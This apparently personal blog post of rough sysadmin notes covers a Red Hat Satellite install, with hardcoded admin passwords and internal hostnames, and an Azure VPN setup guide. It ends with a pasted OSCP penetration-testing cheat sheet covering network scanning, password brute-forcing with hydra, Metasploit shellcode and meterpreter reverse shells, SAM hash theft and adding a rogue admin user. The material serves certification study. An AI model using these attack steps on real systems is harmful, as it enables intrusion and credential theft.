INSTALLING RED HAT SATELLITE SERVER 6.2 Rough notes

1)  Enabled Following Repos:
INSTALLING RED HAT SATELLITE SERVER 6.6

1) Enable S
subscription-manager repos --enable=rhel-7-server-rpms --enable=rhel-7-server-optional-rpms --enable=rhel-7-server-satellite-6.2-rpms --enable=rhel-server-rhscl-7-rpms










STEPS:
1) Take a snapshot
2) IP
3) DNS
4) Proxy configurations
5) snapshot
6) scripted install
7) If works fine then OK otherwise step by step install
8) create check points for better installation




hammer repository-set enable --organization "Smart" --product 'Red Hat Enterprise Linux Server' --basearch='x86_64' --releasever='7Server' --name 'Red Hat Enterprise Linux 7 Server (RPMs)'

#hammer repository-set enable --organization "Smart" --product 'Red Hat Enterprise Linux Server' --basearch='x86_64' --releasever='7Server' --name 'Red Hat Enterprise Linux 7 Server (Kickstart)'
#hammer repository-set enable --organization "Smart" --product 'Red Hat Enterprise Linux Server' --basearch='x86_64' --name 'Red Hat Satellite Tools 6.2 (for RHEL 7 Server) (RPMs)'

#hammer repository-set enable --organization "Smart" --product 'Red Hat Enterprise Linux Server' --basearch='x86_64' --name 'Red Hat Enterprise Linux 7 Server - RH Common RPMs x86_64 7Server'


hammer repository synchronize --async --organization "Smart" --product 'Red Hat Enterprise Linux Server'  --name 'Red Hat Enterprise Linux 7 Server Kickstart x86_64 7Server'
hammer repository synchronize --async --organization "Smart" --product 'Red Hat Enterprise Linux Server'  --name 'Red Hat Satellite Tools 6.2 for RHEL 7 Server RPMs x86_64'
hammer repository synchronize --async --organization "Smart" --product 'Red Hat Enterprise Linux Server'  --name 'Red Hat Enterprise Linux 7 Server RPMs x86_64 7Server'
hammer repository synchronize --async --organization "Smart" --product 'Red Hat Enterprise Linux Server'  --name 'Red Hat Enterprise Linux 7 Server - RH Common RPMs x86_64 7Server'



hammer content-view create --organization "Smart" --name 'RHEL7_ Base' --label rhel7_base --description 'Core Build for RHEL 7'

#hammer content-view add-repository --organization "Smart" --name 'RHEL7_Base' --product 'Red Hat Enterprise Linux Server' --repository 'Red Hat Enterprise Linux 7 Server RPMs x86_64 7Server'
#hammer content-view add-repository --organization "Default Organization" --name 'RHEL7_base' --product 'Red Hat Enterprise Linux Server' --repository 'Red Hat Satellite Tools 6.2 for RHEL 7 Server RPMs x86_64'

#hammer content-view add-repository --organization "Default Organization" --name 'RHEL7_base' --product 'Red Hat Enterprise Linux Server' --repository 'Red Hat Enterprise Linux 7 Server - RH Common RPMs x86_64 7Server'

#hammer content-view add-repository --organization "Default Organization" --name 'RHEL7_base' --product 'EPEL 3rd Party Packages'  --repository  'EPEL 7 - x86_64'







hammer lifecycle-environment create --organization "Smart" --description 'Development' --name 'DEV' --label development --prior Library
hammer lifecycle-environment create --organization "Smart" --description 'Production' --name 'PROD' --label production --prior 'DEV'



cat > .hammer/cli_config.yml <:foreman:
    :host: 'https://localhost/'
    :username: 'admin'
    :password: 'redhat'

EOF


------------------

try

yum update java

  245  hostnamectl set-hostname sp1lvlxset02.sdp
 echo 172.28.68.47 sp1lvlxset02.sdp sp1lvlxset02 >> /etc/hosts

  246  vi /etc/hosts
  247  ping sp1lvlxset02
  248  facter fqdn
  249  hostname
  250  hostname -f
  251  ping -c1 localhost
  252  ping -c1 `hostname -s`
  253  ping -c1 `hostname -f`
  254  cp /etc/httpd/conf.modules.d/xsendfile.conf  /etc/httpd/conf.d/
  255  ll /etc/httpd/conf.d/xsendfile.conf
  256  ll /etc/httpd/conf.modules.d/xsendfile.conf
  257  systemctl restart httpd
  258  ls -l /usr/share/tomcat/conf/keystore
  259  ll /etc/candlepin/certs/keystore
rpm -qa | grep java

satellite-installer --scenario satellite --foreman-initial-organization "Smart" --foreman-initial-location "SDP_MEYDAN_DC" --foreman-admin-username admin --foreman-admin-password HP1nvent --verbose --katello-proxy-url=http://proxy.server --katello-proxy-port=8080




  273   hostnamectl set-hostname sp1lvlxset02.sdp
  274  hostname -f
  275  facter fqdn
vi /etc/hosts
----

In case of a static IP address with no DNS, ensure /etc/hosts contains the FQDN hostname in the first position, for example:

Raw
192.168.1.1 satellite.example.com
-------
Note that if changing the hostname at this stage of deployment, first ensure that you can successfully run these pings:
Raw
ping -c1 localhost
ping -c1 `hostname -s` # my_system
ping -c1 `hostname -f` # my_system.domain.com

cp /etc/httpd/conf.modules.d/xsendfile.conf  /etc/httpd/conf.d/
Attempt to restart httpd:

systemctl restart httpd
--------------

Confirm ownership and permissions of the files below. Correct them as needed.
Raw
# ls -l /usr/share/tomcat/conf/keystore
lrwxrwxrwx. 1 tomcat foreman 25 Sep 11 18:12 /usr/share/tomcat/conf/keystore -> /etc/pki/katello/keystore

# ls -l /etc/pki/katello/keystore
-rw-r--r--. 1 root root 2954 Sep 11 18:12 /etc/pki/katello/keystore

# ls -l /etc/foreman-proxy/ssl_cert.pem
-rw-r--r--. 1 root root 5579 Sep 11 18:11 /etc/foreman-proxy/ssl_cert.pem

---------------------------




  276  satellite-installer --scenario satellite --foreman-initial-organization "Smart" --foreman-initial-location "SDP_MEYDAN_DC" --foreman-admin-username admin --foreman-admin-password HP1nvent  --verbose


satellite-installer --scenario satellite --upgrade --verbose


------------------------JAVA VERSION-----------
Workaround

Run:

Raw
# rpm -e java-1.8.0-openjdk-headless-1.8.0.45-28.b13.el6_6.x86_64 java-1.8.0-openjdk-1.8.0.45-28.b13.el6_6.x86_64
# yum -y install java-1.7.0-openjdk
# alternatives --config java
Then pick the number next to 1.7.0 and re-run the installer.
Root Cause

The default version of java installed with RHEL 6.6 does not work with Red Hat Satellite 6.
Diagnostic Steps

Check the version of java installed and verify it's not 1.8:

Raw
# rpm -qa | grep java


------------

Resolution

To fix this issue can you please run below commands:
Raw
# foreman-rake console
irb(main):001:0> Host.find_by_name("client1.example.com").interfaces=[]
Re-run the same upgrade command again to complete the satellite upgrade process.
Root Cause

From output of Host.find_by_name, it seems that the network interface set to the system has subnet set as blank.
Raw
irb(main):002:0> Nic::Managed.where(:host_id => Host.find_by_name('client1.example.com'), :primary => true, :provision => true)
=> #]>
irb(main):003:0>
----------





katello-installer --katello-proxy-url=http://myproxy.example.com --katello-proxy-port=8080 --katello-proxy-username=proxy_username --katello-proxy-password=proxy_password
  277  facter fqdn
  278  'hostname -f
  279  hostname -f
  280   hostnamectl set-hostname SP1LVLXSET02.sdp
  281  hostname -f
  282  facter fqdn


Resolution

Change the specified proxy username to one that does not include the domain or '\' special character.
Note: prior to re-running the Satellite installer, ensure that any bash proxy definitions are cleared :

Raw
# export http_proxy=""
# export https_proxy=$http_proxy
# export no_proxy=$http_proxy



[root@sp1lvlxset02 ~]#  satellite-installer --scenario satellite --foreman-initial-organization "Smart" --foreman-initial-location "SDP_MEYDAN_DC" --foreman-admin-username admin --foreman-admin-password HP1nvent
Installing             --- /etc/foreman-proxy/settings.d/pulpnode.ymlens201 [99%] [.................................................................................................................  /Stage[main]/Foreman::Database/Foreman::Rake[db:seed]/Exec[foreman-rake-db:seed]: Failed to call refresh: /usr/sbin/foreman-rake db:seed returned 1 instead of one of [0]
 /Stage[main]/Foreman::Database/Foreman::Rake[db:seed]/Exec[foreman-rake-db:seed]: /usr/sbin/foreman-rake db:seed returned 1 instead of one of [0]
 /Stage[main]/Foreman_proxy::Register/Foreman_smartproxy[sp1lvlxset02.sdp]: Could not evaluate: Proxy sp1lvlxset02.sdp cannot be registered (Could not load data from https://sp1lvlxset02.sdp.smart.ae
 /Stage[main]/Foreman_proxy::Register/Foreman_smartproxy[sp1lvlxset02.sdp]: Failed to call refresh: Proxy sp1lvlxset02.sdp.smart.ae cannot be registered (Could not load data from https://sp1lvlxset02.sdp.smart.ae
 /Stage[main]/Foreman_proxy::Register/Foreman_smartproxy[sp1lvlxset02.sdp]: Proxy sp1lvlxset02.sdp.smart.ae cannot be registered (Could not load data from https://sp1lvlxset02.sdp.smart.ae
Installing             Done                                               [100%] [.................................................................................................................]
  Something went wrong! Check the log for ERROR-level output
  The full log is at /var/log/foreman-installer/satellite.log




  283  grep -r SP1LVLXSET02 /
  284  grep -r SP1LVLXSET02 / 2> /dev/null
  285  facter fqdn
  286  vi /root/.hammer/cli_config.yml
  287  facter fqdn
  288  hostname -f
  289  grep -r SP1LVLXSET02 / 2> /dev/null
  290  yum -y install satellite foreman-proxy
  291  hostname set-hostname sp1lvlxset02.sdp
  292  hostnamectl set-hostname sp1lvlxset02.sdp
  293  hostname
  294  echo $HOSTNAME
  295  cat .bash_profile
  296  cat /.bashrc
  297  cat ~/.bashrc
  298  cat /etc/bashrc
  299  cat /etc/bashrc|grep -i host
  300  echo $HOSTNAME
  301  reboot
  302  history
  303  satellite-installer --scenario satellite --foreman-initial-organization "Smart" --foreman-initial-location "SDP_MEYDAN_DC" --foreman-admin-username admin --foreman-admin-password HP1nvent
  304  cat /etc/hosts
  305  echo 172.28.68.47 sp1lvlxset02.sdp  sp1lvlxset02 >> /etc/hosts
  306  vi /etc/hosts
  307  ip r s
  308  satellite-installer --scenario satellite --foreman-initial-organization "Smart" --foreman-initial-location "SDP_MEYDAN_DC" --foreman-admin-username admin --foreman-admin-password HP1nvent
  309  history

--------------

How to disable password aging for an user account

chage -m 0 -M 99999 -I -1 -E -1 lxuser1

[root@sp1lvlxbpm01 ~]# chage -l lxuser1

Last password change                                    : Feb 13, 2017

Password expires                                        : never

Password inactive                                       : never

Account expires                                         : never

Minimum number of days between password change          : 0

Maximum number of days between password change          : 99999

Number of days of warning before password expires       : 7

http://www.thegeekstuff.com/2009/04/chage-linux-password-expiration-and-aging/

BareOS Backup - Opensource backup

http://doc.bareos.org/master/html/bareos-manual-main-reference.html

How to Configure a Site-to-Site IPsec VPN to the Microsoft Azure VPN Gateway

You can configure your Barracuda NextGen Firewall X-Series to connect to the IPsec VPN gateway service in the Microsoft Azure cloud.

Before you Begin

• Create and configure a Microsoft Azure static VPN Gateway for your virtual network.
• You will need the following information:
  • VPN Gateway
  • External IP address for the X-Series Firewall
  • Remote and local networks.

Step 1.Create a Network in the Microsoft Azure cloud

Create a virtual Network in the Microsoft Azure cloud. Choose subnets which are not present in your local networks to avoid IP address conflicts.

1. Log into your Microsoft Azure Management Portal (https://manage.windowsazure.com[1])
2. In the left pane click NETWORKS.
   
3. In the bottom left corner click + NEW.
4. Click CUSTOM CREATE. The create a virtual network windows opens.
5. Enter the Name for the network.
6. Select a Location. E.g., West Europe 
7. Click NEXT . 
   
8. (optional) Enter or select a DNS server. 
9. In the right panel enable Configure site-to-site VPN.
10. Select Specify a New Local Network from the LOCAL NETWORK drop down. 
    
11. Click Next .
12. Enter a NAME for your local on-premises network.
13. Enter the VPN DEVICE IP ADDRESS. This is the external IP address of the X-Series Firewall running the VPN service.
14. In the ADDRESS SPACE section enter the on-premise network(s). E.g., 10.10.200.0/24
15. Click Next .
    
16. In the Virtual Network Address Spaces section click add subnet:
    
    • Subnet – Enter a name for the subnet. 
    • Starting IP – Enter the first IP of the IP Range for the subnet. E.g., 10.10.201.0
    • CIDR(ADDRESS COUNT) – Select the subnet mask from the list. E.g., /24 for 256 IP addresses
17. Click add gateway subnet:
    • Starting IP – Enter the first IP for the gateway subnet. E.g., 10.10.201.0
    • CIDR (ADDRESS COUNT) – Select the subnet mask from the list. E.g., /29 for 8 IP addresses
      
18. Click OK .

The Azure Virtual Network you have just created is now listed in the NETWORK menu in the Azure management interface.

Step 2. Create a VPN Gateway for the Microsoft Azure Network

Create the Azure VPN Gateway.

1. Log into your Microsoft Azure Management Portal (https://manage.windowsazure.com)[2].
2. In the left pane click NETWORKS.
   
3. Click on the Network previously created in Step 1. 
   
4. in the top menu click on DASHBOARD.
5. In the bottom pane, click CREATE GATEWAY. 
   
6. Select Static Routing from the list. Creating the gateway will take a couple of minutes.

When the color of the gateway turns blue, the gateway has been successfully created. The Gateway IP is now displayed below the VPN Gateway image.

Step 3. Configure IPsec Site-to-Site VPN on the X-Series Firewall

Create a active IPsec VPN connection on the X-Series Firewall.

1. Go to the Site-to-Site page (VPN > Site-to-Site). 
2. If your are using a dynamic address (DHCP, xDSL, 3G) to connect to the Internet, or if you are behind a NAT enableUse Dynamic IPs in the GLOBAL SERVER SETTINGS section and click Save. The VPN service restarts.
3. In the Site-to-Site IPsec Tunnels section click on Add.
4. Enter the Name for the IPsec VPN. E.g., AzureVPNGateway
5. Configure the Phase 1 and Phase 2 encyption settings: 
   
   • Phase 1:
     • Encryption – AES
     • Hash Method – SHA
     • DH Group – Group 2
     • Lifetime – 28800
   • Phase 2:
     
     • Encryption – AES
     • Hash Method – SHA256
     • Lifetime – 3600
     • Perfect Forward Secrecy – No
   • Local End – Active
   • Local Address – Dynamic or static if you are using a static WAN connection.
   • Local Networks – Enter your on-premise subnet(s). E.g.,
   • Remote Gateway – Enter the IP for the GATEWAY IPADDRESS  listed on the DASHBOARD of your Azure network. E.g., 137.117203.108
   • Remote Networks – Enter the remote VPC subnet. E.g., 10.10.201.0/24
   • Authentication – Select Shared Passphrase. 
   • Passphrase – Enter the Shared Key generated by your Azure VPN Gateway. To view the shared key go to theDASHBOARD of your Azure network and click on the Manage Key icon in the bottom pane.
     
   • Enable Aggressive – No,
     
6. Click Save.

Step 4. Create a Access Rule

If you do not have the VPN-SITE-2-SITE access rule you must create an access rule to allow traffic to allow traffic from your local network to the Azure subnet.

1. Go to the FIREWALL > Firewall Rules page.
2. Add a Access Rule: 
   
   • Type – Select ALLOW.
   • Source – Enter your local network(s) or select a network object containing only your local network(s). E.g., 10.10.200.0/24
   • Destination – Enter the remote subnet in the Azure Network. E.g., 10.10.201.0/24
   • Network Services – Select Any.
   • Connection – Select No SNAT
3. Click Save. 
4. Place the firewall rule so no rule matches the VPN traffic above it.
5. Click Save.

Your X-Series Firewall will now automatically connect to the Azure VPN Gateway.

Reference: https://campus.barracuda.com/product/nextgenfirewallx/article/NGX/ConfigAzureVPNGateway/

cloned appliance VM mac issue

sometimes it's necessary to use last used mac address for the clone, in order to get to work.

CFME console access via ssh connection

[root@cfme01 ~]# LOCK_CONSOLE=false /bin/appliance_console

OSCP Cheat Sheet

Scan network for live hosts (nmap/zenmap)

For NMAP –

nmap -vv -sP 192.168.0.1-254 -oG hosts_up.txt cat hosts_up.txt | grep -i “up”

nmap -PN 192.168.9.200-254

(this will also show open ports for each host)

Identify OS (nmap/zenmap) For NMAP –

nmap -O 192.168.0.100 (just OS fingerprint)

nmap -A 192.168.9.201 (runs an “aggressive” scan – scan,OS fingerprint, version scan, scripts and traeroute)

Check hosts for services (nmap/zenmap)

For NMAP

- nmap -sS 192.168.9.254 (TCP)

- nmap -sU 192.168.9.254 (UDP)

(Could be better to do this in zenmap and group servers by services)

FOR SNMP

- snmpwalk -c public -v1 192.168.9.254 1 |grep hrSWRunName|cut -d” ” -f

For a known port

- nmap – p 139 192.168.9.254

DNS Lookups/Hostnames

host -l

e.g. host -l acme.local 192.168.0.220

Banner grab/Version services

(nmap/zenmap/SNMP)

Check versions of software/services against milw 0rm and security focus)

For NMAP

- nmap -sV 192.168.9.254

For SNMP

snmpenum -t 192.168.0.100 (displays all snmp informations for that server)

For SMTP

nc -v 25

Will give mailserver version. Can also VRFY to find valid usernames/email accounts

Netbios/SMB

smb4k (graphical interface – lists shares)

smbserverscan

metasploit auxiliary scanner

./msfconsole show

use scanner/smb/version

set RHOSTS 192.168.0.1-192.168.0.254

run

Enumerate Usernames (SNMP/SMTP/SMB[NETBIOS]/Add others here)

For SMB

nmap -sT -p 445 192.168.9.200-254 -oG smb_results.txt (then grep open sessions) (on my machine /root/offsec) ./samrdump.py 192.168.9.201 (results from above)

For SNMP

nmap -sT -p 161 192.168.9.200/254 -oG snmp_results.txt (then grep)

- snmpwalk public -v1 192.168.9.201 1 |grep 77.1.2.25 |cut -d” “ -f4

For SMTP – (/pentest/enumeration/vrfy)

./smtp_VRFY.py

** NEED TO MAKE THREADED – VERY SLOW **

SAMRDUMP.PY – (/pentest/python/impacket-examples/samrdump.py)

- ./samrdump.py SNMP server

*** NAMES.TXT – /pentest/enumeration/vrfy/names.txt ***

*** OR /pentest/web/wfuzz/wordlists/others/names.txt ***

Crack Passwords (hydra/THC bruter)

(need mil-dict.txt from Milw 0rm – cracked hashs)

FTP – hydra -l -P mil-dic.txt -f ftp -V

POP3 – hydra -l -P mil-dict.txt -f pop3 -V (may need to use -t 15 to limit concurrent connections)

SNMP – hydra -P mil-dict.txt -f -V

MS VPN – dos2unix words (whatever word list) cat words | thc-pptp-bruter VPN server

12/30/12 A nice OSCP cheat sheet |

Look for known vulnerable services (refer nmap/zenmap output)

Check versions of software (by either snmp enumeration or nmap/zenmap) against http://www.milw 0rm.com/search.php or http://www.securityfocus.com/vulnerabilities or http://www.exploit-db.com

Compile exploit code if possible (milw 0rm archive)

cd /pentest/exploits/milw 0rm cat sploitlist.txt | grep -i [exploit]

Some exploits may be written for compilation under Windows, while others for Linux. You can identify the environment by inspecting the headers.

cat exploit | grep “#include”

Windows: process.h, string.h, winbase.h, windows.h, winsock2.h

Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h

Grep out Windows headers, to leave only Linux based exploits:

12/30/12

cat sploitlist.txt | grep -i exploit | cut -d ” ” -f1 | xargs grep sys | cut -d “:” -f1 | sort -u

LINUX

gcc -o dcom 66.c

./dcom

WINDOWS

cd /root/.wine/drive_c/MinGW/bin

wine gcc -o ability.exe ability.c -lwsock32 wine ability.exe (to run compiled file)

Wireshark Filters

To filter out all traffic for IP 192.168.0.100

!(IP.ADDR == 192.168.0.100)

FUZZING STEPS – ASH STYLE

1. Determine target application and operating system

2. Obtain a copy of the application

3. Analyse the RFC & communication protocols

4. Discover & record crash conditions

5. Analyse crash conditions for exploitation opportunities

Things we need to know

Which 4 bytes overwrite EIP

Do we have enough space in buffer for shellcode Is this shellcode easily accessible in memory Does the application filter out any characters

Will we encounter overflow protection mechanisms

(*** HANDY – framework3/tools -> nasm_shell.rb => JMP ESP ***) Creating pattern for EIP location

framework3/tools -> pattern_create.rb >> Fuzzing_script (will append to the end of the script)

then look in ollydbg for pattern (need to reverse it and convert)

pattern_offset.rb

will show byte offset

Creating shellcode (in framework3)

./msfpayload |grep -i shell

./msfpayload …… o (for options)

./msfpayload …… c (to create)

** TAKE NOTE OF SHELLCODE SIZE AND ADJUST FINAL BUFFER TO SUIT ** CAN ALSO USE FRAMEWORK2 MSFWEB INTERFACE (super easy)

Finding an exploit

/pentest/exploits/milw 0rm grep sploitlist.txt

MSFCLI (p243)

./msfcli

-o options

9/12

-p payloads

-t test

-e exploit

MSFCONSOLE

sessions -l => list created sessions

sessions -i # => interact with specific session number show options

search

use exploit/ ….. set PAYLOAD ….

exploit

Meterpreter Payloads (p260)

payload = windows/meterpreter/reverse_tcp …. meterpreter> help (lists all commands)

upload c:\\windows

download c:\\windows\\repair\\sam /tmp ps (running tasks)

execute -f cmd -c (creates a new channel with the cmd shell) interact # (interacts with channel)

Other useful windows commands net user ash my_password /add

net localgroup administrators ash /add

Passwords & Hashes

Windows SAM => %systemroot%\Repair (pwdump or fgdump – p340)

Leave a Reply

Your email address will not be published. Required fields are marked * Name

Email

Website